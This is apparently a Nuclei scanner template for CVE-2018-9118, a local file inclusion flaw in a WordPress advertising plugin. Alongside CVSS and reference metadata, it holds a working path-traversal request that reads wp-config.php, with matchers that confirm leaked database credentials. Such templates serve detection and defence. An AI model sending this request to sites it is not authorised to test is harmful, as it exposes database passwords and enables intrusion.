id: CVE-2018-9118 info: name: WordPress 99 Robots WP Background Takeover Advertisements <=4.1.4 - Local File Inclusion author: 0x_Akoko severity: high description: | WordPress 99 Robots WP Background Takeover Advertisements 4.1.4 is susceptible to local file inclusion via exports/download.php. impact: | This vulnerability can lead to unauthorized access to sensitive files on the server, potentially exposing sensitive information or allowing for further exploitation. remediation: | Upgrade to 4.1.15. reference: - https://www.exploit-db.com/exploits/44417 - https://wpvulndb.com/vulnerabilities/9056 - https://99robots.com/docs/wp-background-takeover-advertisements/ - https://nvd.nist.gov/vuln/detail/CVE-2018-9118 - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2018-9118 cwe-id: CWE-22 epss-score: 0.07018 epss-percentile: 0.93812 cpe: cpe:2.3:a:99robots:wp_background_takeover_advertisements:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 vendor: 99robots product: wp_background_takeover_advertisements framework: wordpress tags: cve2018,cve,edb,wordpress,wp-plugin,lfi,traversal,wp,99robots http: - method: GET path: - '{{BaseURL}}/wp-content/plugins/wpsite-background-takeover/exports/download.php?filename=../../../../wp-config.php' matchers-condition: and matchers: - type: word part: body words: - "DB_NAME" - "DB_PASSWORD" - "DB_HOST" - "The base configurations of the WordPress" condition: and # digest: 4b0a00483046022100d6d3b6187f774e9c2146fd3b53f488bcac19a3f11bcba527c546f24479ab6057022100a42013e5cd5cb9001d5e8f6a8d82fd0296023000fcba05bc258bbdd09c0e29bc:922c64590222798bb761d5b6d8e72950